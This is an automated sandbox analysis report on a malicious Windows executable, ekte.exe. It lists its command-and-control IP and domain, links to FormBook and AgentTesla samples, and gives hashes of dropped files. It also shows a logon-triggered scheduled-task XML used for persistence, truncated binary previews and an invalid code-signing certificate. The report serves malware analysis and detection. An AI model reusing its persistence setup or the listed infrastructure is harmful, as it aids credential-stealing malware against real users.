206.119.82.148  wdgb23.top              United States  174    COGENT-174US          true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1538477
Start date and time: 2024-10-21 13:13:44 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ekte.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@24/19@12/6
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 136
• Number of non-executed functions: 195
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 23.77.197.180, 23.77.197.145
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target eFDiSxeTfjUqTk.exe, PID 3056 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: ekte.exe
Time      Type             Description
04:14:47  Task Scheduler   Run new task: eFDiSxeTfjUqTk path: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
07:14:40  API Interceptor  60x Sleep call for process: ekte.exe modified
07:14:43  API Interceptor  86x Sleep call for process: powershell.exe modified
07:14:44  API Interceptor  5x Sleep call for process: schtasks.exe modified
07:14:48  API Interceptor  160x Sleep call for process: taskeng.exe modified
07:14:49  API Interceptor  56x Sleep call for process: eFDiSxeTfjUqTk.exe modified
07:15:19  API Interceptor  2590x Sleep call for process: BuhvZTwGQCD.exe modified
07:15:23  API Interceptor  2336216x Sleep call for process: findstr.exe modified
                                                                                mips.elfGet hashmaliciousMiraiBrowse
                                                                                • 172.105.8.48
                                                                                ITLDC-NLUArPDG8838EHU0309-XYSUJ288399-PQSHXII399.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.174.175.187
                                                                                DHL TRACKING NUMBER.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 217.12.218.219
                                                                                EKTEDIR.exeGet hashmaliciousFormBookBrowse
                                                                                • 185.174.173.22
                                                                                UUNbg1gvrR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 217.12.218.219
                                                                                Quote101024.docGet hashmaliciousVIP KeyloggerBrowse
                                                                                • 217.12.218.219
                                                                                99HGuuYvKA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.174.173.22
                                                                                sse5JV1aR1.exeGet hashmaliciousFormBookBrowse
                                                                                • 185.174.173.22
                                                                                QmVWuHXmm9.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.174.173.22
                                                                                1YxRjAO7k2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.174.173.22
                                                                                9vhyFG1hNa.exeGet hashmaliciousFormBookBrowse
                                                                                • 185.174.173.22
                                                                                No context
Match: C:\Users\user\AppData\Local\Temp\sqlite3.dll
Associated samples:
• Filename: SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsx, Detection: malicious, Threat Name: FormBook
• Filename: tEBdYCAxQC.rtf, Detection: malicious, Threat Name: FormBook
• Filename: product Inquiry and RFQ ART LTD.doc, Detection: malicious, Threat Name: FormBook
• Filename: PAYROLL.doc, Detection: malicious, Threat Name: FormBook
• Filename: PAYROLL.doc, Detection: malicious, Threat Name: FormBook
• Filename: SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf, Detection: malicious, Threat Name: FormBook, PureLog Stealer
• Filename: d0#U10dc.xls, Detection: malicious, Threat Name: FormBook
• Filename: PO_JP233001_708.xls, Detection: malicious, Threat Name: FormBook
• Filename: Shipping Documents PL CI.doc, Detection: malicious, Threat Name: FormBook
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................
                                                                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                  Category:dropped
                                                                                                  Size (bytes):443612
                                                                                                  Entropy (8bit):7.998557897787061
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:12288:hWVnSHJ7x6kXRxT5Na4Bz1am34CpgXzOZPf:FHJF6ORxT5ci51Jpgjqf
                                                                                                  MD5:ECC8AC417181D4885EF8C208D1F073DC
                                                                                                  SHA1:33154E45485BC0AE3BB0203FFCB9BAAAED4038D3
                                                                                                  SHA-256:D01C69D09282F9050F6B113C45884FE9B9ABF3BDF5BD93B45927D9B6BFB233FE
                                                                                                  SHA-512:F7601763447BED9B7B45FEF2BD584DA669636D2657C6066516C949E713CE1CAF0641A1889345E92E584B84F438FA19029D13C6F6F1583D35FCC1EB3F998631DA
                                                                                                  Malicious:false
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1
                                                                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):77824
                                                                                                  Entropy (8bit):1.0714656887192844
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:LSe7mlcwilGc7Ha3f+uG01YLvqAogv5KzzUG+Qk/BuqBFzsCWo3qkrH1VumgXn:LscflGwucCaM0f6kL1Vumi
                                                                                                  MD5:9867F6F82F226DE748557B47C82BE25D
                                                                                                  SHA1:B10DE25FA81662E082C60C8700E348C19AE7404B
                                                                                                  SHA-256:CCB153269D92EC65916497E01D0E63A4A61767603EBB226FFD35DCC983B62A55
                                                                                                  SHA-512:25917CB9C6632DB1F75C80CC6D64077EF742F6A6F2134DAB7D8DEFEB4DA10040A91B98A03560DDBF6A096E2ADC8CF496902E54877665B9E1C5542397C889E214
                                                                                                  Malicious:false
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unknown
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1
                                                                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4993
                                                                                                  Entropy (8bit):4.3475762221054035
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GcuN4gR+7Oc0XRMcCM3KVGOF9+BlMtvrmNHY0ac:E4Q+7Oc0JKVBF9+EvrmNHcc
                                                                                                  MD5:236236B6B95270B56C22F72FA7DFEC5C
                                                                                                  SHA1:DD00CA5516404703005D42C33524BC6778BE8419
                                                                                                  SHA-256:C5EDF6AFD22DD7FD0EFA2996716F25CD739731CAEA328532A8FD6EC64600E630
                                                                                                  SHA-512:084664F51A3E521155F1ACF6F35F7EDEEF74656536841B90F67FD2926F9815AD9D571D06E9EF19FBD2EF7050D99FDCF2E6BCD8974BFC340D004A141AA84646AF
                                                                                                  Malicious:false
                                                                                                  Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_column_decltype.sqlite3_co
                                                                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):848173
                                                                                                  Entropy (8bit):6.502216720347079
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:VQTDOecqrIiIUmA+fciEXThQEGMT7G4Cq0Nwe:VyNcmIUmnf3EXThQEGDNF
                                                                                                  MD5:D5EA9B5814553BD2F9BBB8BF0EA94ED6
                                                                                                  SHA1:29629836C088DCD968EFB321832EDCBCFAAC5B51
                                                                                                  SHA-256:5EA67D6B7F67301CA214AF511740F26B9E6CC9E16B2C0EC7BBA071D05B9BDE78
                                                                                                  SHA-512:6867452995C8354622FE22CE4FB4868D2B9CB28BB31AA60B42F06E494B952F66C427AA66C7AF09240954BF55EBCDE62D4C7FEB9D99E742EA3BC5BEB3756A7A1E
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsx, Detection: malicious, Browse
                                                                                                  • Filename: tEBdYCAxQC.rtf, Detection: malicious, Browse
                                                                                                  • Filename: product Inquiry and RFQ ART LTD.doc, Detection: malicious, Browse
                                                                                                  • Filename: PAYROLL.doc, Detection: malicious, Browse
                                                                                                  • Filename: PAYROLL.doc, Detection: malicious, Browse
                                                                                                  • Filename: SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf, Detection: malicious, Browse
                                                                                                  • Filename: d0#U10dc.xls, Detection: malicious, Browse
                                                                                                  • Filename: PO_JP233001_708.xls, Detection: malicious, Browse
                                                                                                  • Filename: Shipping Documents PL CI.doc, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%..X....[......!...............................a.......................................... .........................]............0.......................@..`0........................... .......................................................text...X...........................`.P`.data...|...........................@.`..rdata..4...........................@.`@.bss..................................`..edata..]...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc........0......................@.0..reloc..`0...@...2..................@.0B/4..................................@.@B/19................................@..B/31..........0......................@..B/45..........P......................@..B/57..........p......................@.0B/70.....i...............
                                                                                                  Process:C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1580
                                                                                                  Entropy (8bit):5.115141165473888
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuT3v
                                                                                                  MD5:E8CC20BCBC9EAB57AAA4A69584B4E6E4
                                                                                                  SHA1:E1371B69E09A2A59BBECF8AA1932707535913BD8
                                                                                                  SHA-256:887969E30667C42E3012326BA25DBBD49ABAB8DCA659C799B5AE0B8A06E91541
                                                                                                  SHA-512:A7FB0D28F097C46C30E9F6EB05F7B33A95BB1AC32CA27E6D68F2B9C5E2F6F0BF9B84A99E414876ABBC1494F753E5070F6E706D368463134837A239B44F82B322
                                                                                                  Malicious:false
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                  Process:C:\Users\user\Desktop\ekte.exe
                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                  Category:modified
                                                                                                  Size (bytes):1580
                                                                                                  Entropy (8bit):5.115141165473888
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuT3v
                                                                                                  MD5:E8CC20BCBC9EAB57AAA4A69584B4E6E4
                                                                                                  SHA1:E1371B69E09A2A59BBECF8AA1932707535913BD8
                                                                                                  SHA-256:887969E30667C42E3012326BA25DBBD49ABAB8DCA659C799B5AE0B8A06E91541
                                                                                                  SHA-512:A7FB0D28F097C46C30E9F6EB05F7B33A95BB1AC32CA27E6D68F2B9C5E2F6F0BF9B84A99E414876ABBC1494F753E5070F6E706D368463134837A239B44F82B322
                                                                                                  Malicious:true
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1
                                                                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                                                                  File Type:HTML document, ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):190
                                                                                                  Entropy (8bit):4.928010242697307
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:qVZxgROAyR0e0qHXbvx9McfwF0GFS77uR2MBJJULZIlV/4FXFAIuJFXhXWNqD:qzxUeR0eRHXLxytcu1Hlld4zGbeqD
                                                                                                  MD5:29B64AEEF6FFA765F807772C5A37EF26
                                                                                                  SHA1:84C4A3C9C719FB8E08CB98EB723393594BE47A3E
                                                                                                  SHA-256:FDBB57C3A2BE53BF761A2B87335B131A6329A8B0E4011B91EFD06F42E54385C8
                                                                                                  SHA-512:0EB587E98C18221CE44252724355B8031B1FEFBCADE32C6ECF2AED2C1AD658FE24DC2745F0F33303551228C29923CCCF76C141FACA1C015C7413E7537B576BC4
                                                                                                  Malicious:false
                                                                                                  Preview:<html><head><title lineno="380">Not Found</title></head>.<body><h1>Document Not Found</h1>.The document /2021/sqlite-dll-win32-x86-3340000.zip is not available on this server.</body></html>.
                                                                                                  Process:C:\Users\user\Desktop\ekte.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):738312
                                                                                                  Entropy (8bit):7.825038116938872
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:K3GR4py73c1x80GypJsz9exfpoEs3pgd+jH4QxZqtQQikR:bReyz6OzlEGgd+jH4Qby
                                                                                                  MD5:A0F5D21AB28654F9310E591044950160
                                                                                                  SHA1:2DA8C07B8F8E3B1FF29CB2F7DB8419642C0A42E5
                                                                                                  SHA-256:C74E38C2E961CBBC34E20669E3DEB4B31BEEBC94824B096C88D8AAD8B75C4DCF
                                                                                                  SHA-512:8DA1931FFFB1D3145BC017B89DA318EAC9640882D64E3A62EE924B019B82657B2A202DF400517F762A14A198293448DFF8DA313964F327D6791DBCAFF92825AF
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../.g..............0.................. ... ....@.. .......................`............@.................................l...O.... ..(................6...@....................................................... ............... ..H............text........ ...................... ..`.rsrc...(.... ......................@..@.reloc.......@......................@..B........................H.......Hu...`......(...D...(:............................................{....*..{....*V.( .....}......}....*...0..C........u........6.,0(!....{.....{....o"...,.(#....{.....{....o$...+..+..*. .[\. )UU.Z(!....{....o%...X )UU.Z(#....{....o&...X*.0..b........r...p......%..{.......%q.........-.&.+.......o'....%..{.......%q.........-.&.+.......o'....((...*..{)...*..{*...*V.( .....}).....}*...*.0..C........u........6.,0(!....{)....{)...o"...,.(#....{*....{*...o$...+..+..*. (.=. )U
                                                                                                  Process:C:\Users\user\Desktop\ekte.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26
                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                  Malicious:true
                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):7.825038116938872
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:ekte.exe
                                                                                                  File size:738'312 bytes
                                                                                                  MD5:a0f5d21ab28654f9310e591044950160
                                                                                                  SHA1:2da8c07b8f8e3b1ff29cb2f7db8419642c0a42e5
                                                                                                  SHA256:c74e38c2e961cbbc34e20669e3deb4b31beebc94824b096c88d8aad8b75c4dcf
                                                                                                  SHA512:8da1931fffb1d3145bc017b89da318eac9640882d64e3a62ee924b019b82657b2a202df400517f762a14a198293448dff8da313964f327d6791dbcaff92825af
                                                                                                  SSDEEP:12288:K3GR4py73c1x80GypJsz9exfpoEs3pgd+jH4QxZqtQQikR:bReyz6OzlEGgd+jH4Qby
                                                                                                  TLSH:14F412E2435AE722D6A98BF50271D67287719E4FA131D3438EDB9CEB3C507842C486DB
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../.g..............0.................. ... ....@.. .......................`............@................................
                                                                                                  Icon Hash:d0d2c86bb8c4c4b9
                                                                                                  Entrypoint:0x4b10be
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:true
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x670F2FC0 [Wed Oct 16 03:15:12 2024 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                  Signature Valid:false
                                                                                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                  Error Number:-2146869232
                                                                                                  Not Before, Not After
                                                                                                  • 11/12/2018 7:00:00 PM 11/8/2021 6:59:59 PM
                                                                                                  Subject Chain
                                                                                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                  Version:3
                                                                                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                  Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  inc ebx
                                                                                                  add byte ptr [edx+00h], dh
                                                                                                  jne 00007FC2295ACB62h
                                                                                                  add byte ptr fs:[ecx+00h], al
                                                                                                  jo 00007FC2295ACB62h
                                                                                                  jo 00007FC2295ACB62h
                                                                                                  insb
                                                                                                  add byte ptr [ecx+00h], ch
                                                                                                  arpl word ptr [eax], ax
                                                                                                  popad
                                                                                                  add byte ptr [eax+eax+69h], dh
                                                                                                  add byte ptr [edi+00h], ch
                                                                                                  outsb
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb106c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb2000 | 0x1628 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb0e00 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xaf0e4 | 0xaf200 | 5e26abefe141dcbd9899575c17ebc5cc | False | 0.9145783145967167 | data | 7.8327880515520985 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb2000 | 0x1628 | 0x1800 | 95c087510753e537e41f055f2014673d | False | 0.7052408854166666 | data | 6.705727286348662 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb4000 | 0xc | 0x200 | 9376e7647c1a63296d9fa09a1b4ae46d | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb20c8 | 0x120c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.841991341991342
RT_GROUP_ICON | 0xb32e4 | 0x14 | data | | | 1.05
RT_VERSION | 0xb3308 | 0x31c | data | | | 0.4296482412060301
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
